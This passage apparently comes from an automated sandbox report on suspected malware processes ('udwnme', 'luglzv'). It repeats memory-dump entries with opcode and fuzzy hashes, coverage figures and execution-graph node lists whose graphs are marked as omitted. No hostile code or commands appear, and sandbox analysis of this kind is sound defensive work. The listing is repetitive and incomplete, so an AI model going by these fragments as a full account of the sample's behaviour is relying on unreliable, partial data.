                                                                    • Instruction Fuzzy Hash: D6119671E0074A9FDB15CF75C8955EEFBB2BF89350F254A1AD401B7210EB709986CB40
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77dd9eef4477dd90fd7dbc27b3a85555f8f2200c87a51809a484ccb9aaf5ffb8
                                                                    • Instruction ID: 2544becaba095685125ea9ef59dbf8f3400b8cdf59169f7542c39c68b78a4bbb
                                                                    • Opcode Fuzzy Hash: 77dd9eef4477dd90fd7dbc27b3a85555f8f2200c87a51809a484ccb9aaf5ffb8
                                                                    • Instruction Fuzzy Hash: 6421BB34F4420B8BCF88DF64F5AC57EB772EB85340B50896AD812673A8DE385C429B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db2b91513db177835d5c0b43d544e3167c17a098dbbe27e6e7c2b4b5eb494fbc
                                                                    • Instruction ID: 0bd4252e3d02ab072ec5be10e82870bfa394e6887cdcb1c957dba13e52264412
                                                                    • Opcode Fuzzy Hash: db2b91513db177835d5c0b43d544e3167c17a098dbbe27e6e7c2b4b5eb494fbc
                                                                    • Instruction Fuzzy Hash: 97116671E1071A9BDB14CFA5CC845DEFBB5BF89340F118A1AE401BB210EBB0A995CB90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b81d90e33cf0320c4a33e9838764f4f1b829fae8975913680ab7dfa341cec1db
                                                                    • Instruction ID: a90d48aaa617d7024dd7b9f23087a0523a14a6eeb7815396dd781e419754aafc
                                                                    • Opcode Fuzzy Hash: b81d90e33cf0320c4a33e9838764f4f1b829fae8975913680ab7dfa341cec1db
                                                                    • Instruction Fuzzy Hash: 0D119D71F002158FCB15EF68D850AAEB7F6FB98200F10416AD505FB350DB719C018B90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3f2a32945095611a4299aadd8ff3609b2d71b3e54e124e532bab5a8ac778cab
                                                                    • Instruction ID: 0cfa088525da8887162254abf9aba5f54aa670e291926fe109fb36afcf7c3993
                                                                    • Opcode Fuzzy Hash: a3f2a32945095611a4299aadd8ff3609b2d71b3e54e124e532bab5a8ac778cab
                                                                    • Instruction Fuzzy Hash: F411CE31B001168BCB50DFBCA9502EFBBB5EB98220B204176C914E3359E6348D468BD1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c927698399eb966f5c580da54d3fef112b8a469b8b3cf1180a59781d932d07b5
                                                                    • Instruction ID: 78419fb1fdebf984b961e71b098b88eafcec48c83e88a8de3b8f6da7ca8900bf
                                                                    • Opcode Fuzzy Hash: c927698399eb966f5c580da54d3fef112b8a469b8b3cf1180a59781d932d07b5
                                                                    • Instruction Fuzzy Hash: 9F11CE35B041168FCB50DBBCA9902EEBBB5EB88210B140076C905E7619EB35CD468BE1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5428500582d39bdcf69d726b34b08993ccf9a9dfedf952d706feffdbbc136959
                                                                    • Instruction ID: fffc9a4dea1f05df772f2ec2340f0e9e7e9d5482201cbd790da53421ce98c880
                                                                    • Opcode Fuzzy Hash: 5428500582d39bdcf69d726b34b08993ccf9a9dfedf952d706feffdbbc136959
                                                                    • Instruction Fuzzy Hash: 77215C30605215CFDB14AFB9D8146EE7BB2FF49300F10046ED506AB7A1CB3A8C42CB95
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb58a48753bae1dd2a1627099256c5e36f5720afa7678048ffdbc91ab92d4f47
                                                                    • Instruction ID: e416d3287b5a4bcaf7b7fd622ee6a42a4d8da77cb26827ef97a3c60387682bbb
                                                                    • Opcode Fuzzy Hash: eb58a48753bae1dd2a1627099256c5e36f5720afa7678048ffdbc91ab92d4f47
                                                                    • Instruction Fuzzy Hash: DB214A34605215CFDB14AFB9D9196EE7BB2BF49600F10006ED106AB7A0CB798D41DB96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7bfa4382007170b6c5c4c630d3b891cf29029fe49d6d806ad22f6ca4e123478
                                                                    • Instruction ID: f13d992cd2188dd32beab2924cac537ddd6ec8555c5c7230e15ec1e126a0e504
                                                                    • Opcode Fuzzy Hash: b7bfa4382007170b6c5c4c630d3b891cf29029fe49d6d806ad22f6ca4e123478
                                                                    • Instruction Fuzzy Hash: E9118F71F402199FCB109F689958AAEFBF6FB88350F02452AD906D3341DB359D11CBD0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c24e49817af125b79587cbfa9c927018d4260663913e7e643c2527df30995a80
                                                                    • Instruction ID: 5969a0a5b3f0ce5d4a68808762e1d93144801e43b07ee8cd0f29376d4fca84cf
                                                                    • Opcode Fuzzy Hash: c24e49817af125b79587cbfa9c927018d4260663913e7e643c2527df30995a80
                                                                    • Instruction Fuzzy Hash: C611AC70600611CFEB19AF75C5246EE7BB2EF49304F1104BEC506AB7A1DB398C41CB99
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9aaa22812d264c97ab507197ab6925007cf00a9edfdec9a40b9c54b1515b22e
                                                                    • Instruction ID: 0a3d499a994f26af550816e696cfc6d841008d0f4f9eb69781adb140f03bcee2
                                                                    • Opcode Fuzzy Hash: e9aaa22812d264c97ab507197ab6925007cf00a9edfdec9a40b9c54b1515b22e
                                                                    • Instruction Fuzzy Hash: AA115C70600615CFEB14AB79C9156EE7BB2AF49204F11007EC506AB7A5DB398C42CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f89b0371f99a2a87c5b097e3fea1e5d5ac484d9e45feac8fb7bfeaacb149759d
                                                                    • Instruction ID: a5e88948995a1977fbf433dfbeb2a0884689f610093160f965b5a97fd0bb8d28
                                                                    • Opcode Fuzzy Hash: f89b0371f99a2a87c5b097e3fea1e5d5ac484d9e45feac8fb7bfeaacb149759d
                                                                    • Instruction Fuzzy Hash: C711A031F041568BDB90CFBCA5502EFBBF5EB88220B1409A6C905F736AE6349D428BD1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f194aa748d735236b4374b0333b3cba188550459971d0e6bcd3c388a959b2837
                                                                    • Instruction ID: 299547dafaa0178393805bc88758259af7c4edf7d0c09bbe3dca17348650cb53
                                                                    • Opcode Fuzzy Hash: f194aa748d735236b4374b0333b3cba188550459971d0e6bcd3c388a959b2837
                                                                    • Instruction Fuzzy Hash: 46117771E1074A9FDB15DFA5C8845EEFBB6FF89340F25462AE401B7210EB70A985CB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: af46d2514140638ac7ed413aacd13d073d7c9a95cf1dc8f335c03c98821cc4ed
                                                                    • Instruction ID: 826be8162ace8ba5b59530191ef8135c52215cbd6f44630cc3149dff2b37d7d2
                                                                    • Opcode Fuzzy Hash: af46d2514140638ac7ed413aacd13d073d7c9a95cf1dc8f335c03c98821cc4ed
                                                                    • Instruction Fuzzy Hash: 26119170A00201CFC725EF79D5145AAB7E5EF89701B1444BAD405DB365DB39DD42CB50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08bcfc7fb5c75412366750ccc21e650a0237d785b4f93520dfabd2de6e4faaf2
                                                                    • Instruction ID: b3d03a6deb047d871f21073b8a350df50caf8e9af1e0e4f1a1d3f9fc9f8d27b3
                                                                    • Opcode Fuzzy Hash: 08bcfc7fb5c75412366750ccc21e650a0237d785b4f93520dfabd2de6e4faaf2
                                                                    • Instruction Fuzzy Hash: FA012671B002455BCB259B68EC91AEFBBA6EBC1750F00487BE6199B310DF305C098B80
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2916612593.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_11dd000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: c45768c7094d5352564760dd3755687b7c07c3d8ee6b11989f83dcef25a8ad65
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: 8911DF72504240DFDF16CF48D9C0B16BF72FB84324F2481A9D9094B256C33AD45ACBA2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c88bf7267c23964c0a6cedb19f0fff02d77884da5ab9a5c1a55f273d05dfbf18
                                                                    • Instruction ID: 2bef7852b37c9ad8e003bfda5bcff46239ea159a1fc91043347adb956edd183b
                                                                    • Opcode Fuzzy Hash: c88bf7267c23964c0a6cedb19f0fff02d77884da5ab9a5c1a55f273d05dfbf18
                                                                    • Instruction Fuzzy Hash: 7E11BA34F4420B8BCB84DF64F9AC57EB772FB85340B50996AD812673A8DE385C429B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35270aa002f36cdd2a5c4292270e9d529a119cb005a99b6cfb44ec1194bf7c86
                                                                    • Instruction ID: 6065cb8ad1f49e22a379c79ee06745d6aa38a56b6546b16c7341fecedc6353f5
                                                                    • Opcode Fuzzy Hash: 35270aa002f36cdd2a5c4292270e9d529a119cb005a99b6cfb44ec1194bf7c86
                                                                    • Instruction Fuzzy Hash: 860169337141140BCB08A6BDB8546AEB7DAEBC86B6B51843BE60EC3385DEB58C454790
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95e560afb6a936dfd1f8d5f5c1b5238211bc8d2c9f72cd219c668c61572a8b7b
                                                                    • Instruction ID: d5d355c92d5d587044446dede31152c749fdcd1cb0ae1c584ddfd1eaf0306a98
                                                                    • Opcode Fuzzy Hash: 95e560afb6a936dfd1f8d5f5c1b5238211bc8d2c9f72cd219c668c61572a8b7b
                                                                    • Instruction Fuzzy Hash: DE118E70B002049FCB55EFB9C50466E7BE6EF88601B2044BAD405EB365EB39EC42CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e47e0397bc2e26cc49e7b78c33808bbdc87b82a8b394e15bec066c035bc23099
                                                                    • Instruction ID: a828fc7b8279b7b696978f1ae1211be1499de42d0674cec376ae17ec3f272086
                                                                    • Opcode Fuzzy Hash: e47e0397bc2e26cc49e7b78c33808bbdc87b82a8b394e15bec066c035bc23099
                                                                    • Instruction Fuzzy Hash: B90171B1F051199BCB68DFAA94901EEFFF6FFC8350B24806AD989D2244E6304645C790
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4cba24858404aed83bdf85172514964719ad1c9a4a80efb2a02d30457aa7b60
                                                                    • Instruction ID: 530971ef215ad2b786c7d97fe377c9991a1def331637c2e4c6a56c0052386045
                                                                    • Opcode Fuzzy Hash: f4cba24858404aed83bdf85172514964719ad1c9a4a80efb2a02d30457aa7b60
                                                                    • Instruction Fuzzy Hash: D611A5B1A003048FDB449F64DC8576ABFA1FF84310F15847AE4499F2D6DB758C05C760
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7bff880760f35e34bac3523083c6a1d01a176d46a2361001ccfb0bfaf3ff811a
                                                                    • Instruction ID: 49d2869e2e4c463b1239722d9d757290b954b4eaf0af1d9f5f7589bc2f7be1d7
                                                                    • Opcode Fuzzy Hash: 7bff880760f35e34bac3523083c6a1d01a176d46a2361001ccfb0bfaf3ff811a
                                                                    • Instruction Fuzzy Hash: E311F874E10208EFCB06EFF4D59469DBBB2EB89300F2080A9D905A7355DF395E81EB41
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53cff5e16c7038bb78c66fbc0f7952df0477ba93a3b6da1cb66dc8729497b103
                                                                    • Instruction ID: 82c727c17ddab1c7380fbc28a97ebde0125edae1ed6db92afd1aaac2732e7a57
                                                                    • Opcode Fuzzy Hash: 53cff5e16c7038bb78c66fbc0f7952df0477ba93a3b6da1cb66dc8729497b103
                                                                    • Instruction Fuzzy Hash: 9911CB34F4420B8BCB44DF64F9AC57EB772FB84340B50996AD81267398DE385C529B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c43b2acee2edac2c08c07423254c94c40aa0d0038793f0fecc730269b073a606
                                                                    • Instruction ID: b82613ddb10853658a159f519a9a8c5eeab0f5be04982aece39d34c4dec91a41
                                                                    • Opcode Fuzzy Hash: c43b2acee2edac2c08c07423254c94c40aa0d0038793f0fecc730269b073a606
                                                                    • Instruction Fuzzy Hash: 3F0175B1A003048FDB089F55DC84B6ABBA5FFC8310F55C979E5099F385DBB19844C7A1
                                                                    Memory Dump Source
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2e8b8eafe2ae529e4031189bfa2d7d44452bfb3c37570a0e4fe04dc25724c029
                                                                    • Instruction ID: b92d964a103669d6535855f9bd4c09eb1691e72416732d2eea9ca2a9b941247e
                                                                    • Opcode Fuzzy Hash: 2e8b8eafe2ae529e4031189bfa2d7d44452bfb3c37570a0e4fe04dc25724c029
                                                                    • Instruction Fuzzy Hash: E4D05E30F401298BCB049668B8982AD7732E784350F104865C80597284DE384D128B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 707fedc25f4f103d7a77b33e4bc6c56998a469ede138e67d65f57a7ea24b80b0
                                                                    • Instruction ID: ffed6cbf369f9cb67bcbab2b0f2b8bfda39462a4bc9a8d066eb37965831ed265
                                                                    • Opcode Fuzzy Hash: 707fedc25f4f103d7a77b33e4bc6c56998a469ede138e67d65f57a7ea24b80b0
                                                                    • Instruction Fuzzy Hash: 53C012302001058BC61AFF58E8988253755FBC0302B00046CDC0ABB2A4EE399C60CB12
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20657472e6c8a9654bc9423250e0a8ae065b3c14138aad92ead184f7ed42ea5f
                                                                    • Instruction ID: 923306e9cb87be70771f7be427e99a967fee9fe9905f98a0dca18155e6c14a2e
                                                                    • Opcode Fuzzy Hash: 20657472e6c8a9654bc9423250e0a8ae065b3c14138aad92ead184f7ed42ea5f
                                                                    • Instruction Fuzzy Hash: 1CC08CF081638ACAFF345364D80E3A8BEA9E7C6701F040017B0834E2EE8E384819CB13
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df5480140fa4a0ec4bd6b126eec74355a1704aa2b86432a4440a45b53c643f7d
                                                                    • Instruction ID: b20023facdfa6869651bd5c27f8578161b397ec5dd2a493172a381217c41400e
                                                                    • Opcode Fuzzy Hash: df5480140fa4a0ec4bd6b126eec74355a1704aa2b86432a4440a45b53c643f7d
                                                                    • Instruction Fuzzy Hash: D5C080F0405345C6FF345364D40D3647FA4D745700F040012B4434E1ED8D344415C713

                                                                    Execution Graph

                                                                    Execution Coverage:16.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:165
                                                                    Total number of Limit Nodes:0
                                                                    [Execution graph rendering omitted; only the node list survived extraction. Recoverable content: the graph is rooted at dc0888 in the 00DC0000 region and fans out through dc7588 / dc75e6 to a set of stubs at dc7e29-dc807e. The only API functions the graph reaches are MonitorFromPoint (via 50a3048 / 50a3058 -> 50a3e08), KiUserExceptionDispatcher (via 50a0a6a / 50a0a7c), LdrInitializeThunk (from 50a0b20) and KiUserCallbackDispatcher (from 50a5320).]
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b45b4fbf7a8c04b4643f7e851f979271aa29193ce335d5e28e9f1d3eebd9fd3
                                                                    • Instruction ID: 5420ff733e6263681d79261be565d59ff408becb512cac5e9faf8c0d99dde703
                                                                    • Opcode Fuzzy Hash: 2b45b4fbf7a8c04b4643f7e851f979271aa29193ce335d5e28e9f1d3eebd9fd3
                                                                    • Instruction Fuzzy Hash: D5B13E70E1420A8FDF14CFA9D985B9DBBF2AF88314F28812DE415E7294EB74D845CB91

                                                                    Control-flow Graph

                                                                    [Control-flow graph rendering omitted; the executed / not-executed colouring did not survive extraction. Recoverable content: function spanning dc60fc-dc6354; its only calls are to dc0c34 (from blocks dc630f-dc6312 and dc6323-dc6326); the terminal block dc6354 loops to itself.]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 99f0936579dc8a44eab581ad67839408a5df749076968550ec60a475ee3f4c89
                                                                    • Instruction ID: f7adb20a945eef4e76de3393900201270e6a2210374aa236c43675b691a5ae06
                                                                    • Opcode Fuzzy Hash: 99f0936579dc8a44eab581ad67839408a5df749076968550ec60a475ee3f4c89
                                                                    • Instruction Fuzzy Hash: F4713DB0E0025ADFDB10CFA9C945B9DBBF1EF88314F18812DE415AB254DB74D846CBA5

                                                                    Control-flow Graph

                                                                    [Control-flow graph rendering omitted; the executed / not-executed colouring did not survive extraction. Recoverable content: function entered at dc6108 and spanning dc6108-dc6354 (overlapping the dc60fc function above); its only calls are to dc0c34 (from blocks dc630f-dc6312 and dc6323-dc6326); the terminal block dc6354 loops to itself.]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 4ef3d2afbac284c6e60904ec4e4d88ba95a5b8131fa18618ba16cf6e32b0a50a
                                                                    • Instruction ID: f0b7e7afb849e6fc96cb3fd2a37e97d77cc78b73913165f6d9a2fb0a67b61379
                                                                    • Opcode Fuzzy Hash: 4ef3d2afbac284c6e60904ec4e4d88ba95a5b8131fa18618ba16cf6e32b0a50a
                                                                    • Instruction Fuzzy Hash: BA714DB0E0024ACFDF14CFA9C945B9DBBF2AF88314F18812DE415A7254DB74D841CBA5

                                                                    Control-flow Graph

                                                                    [Control-flow graph rendering omitted; the executed / not-executed colouring did not survive extraction. Recoverable content: function spanning dc7020-dc71f0; block dc7020-dc70f0 calls dc0ce4 and block dc7130-dc71a6 calls dc0b08; the terminal block dc71f0 loops to itself.]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dLlq
                                                                    • API String ID: 0-1852568965
                                                                    • Opcode ID: 92871d09ddc7f0f9b34cafe626e974e0e83b8ebf5f0d1cb1b5186a1257eae355
                                                                    • Instruction ID: 1d59d425f31ac73812e0fa3f98446b2e3c88f05b7205e465ca8fba809d792f87
                                                                    • Opcode Fuzzy Hash: 92871d09ddc7f0f9b34cafe626e974e0e83b8ebf5f0d1cb1b5186a1257eae355
                                                                    • Instruction Fuzzy Hash: A751D275B102149FCB44DF69C898A9EBBF6FF89710B2540AAE506DB3B1DA71EC01CB50
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8865e79424ffa497d9d621645117af35842850ea357cbe5e32fcc88277bbdf84
                                                                    • Instruction ID: 6453132756b2672828294dd562386a4099e030feb2adb4026a4da108b42313b7
                                                                    • Opcode Fuzzy Hash: 8865e79424ffa497d9d621645117af35842850ea357cbe5e32fcc88277bbdf84
                                                                    • Instruction Fuzzy Hash: 68B13E70E1420ACFDF14CFA9D985B9DBBF1AF88314F28812DE415A7294EB74D845CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c6656cd652c361df330e306e7e400eaf473434d5475a96554d5949038111922
                                                                    • Instruction ID: 7fa8afb9364760027280a7f879165a2acbfaa7a101f9d79fe8fbf907be6c0391
                                                                    • Opcode Fuzzy Hash: 6c6656cd652c361df330e306e7e400eaf473434d5475a96554d5949038111922
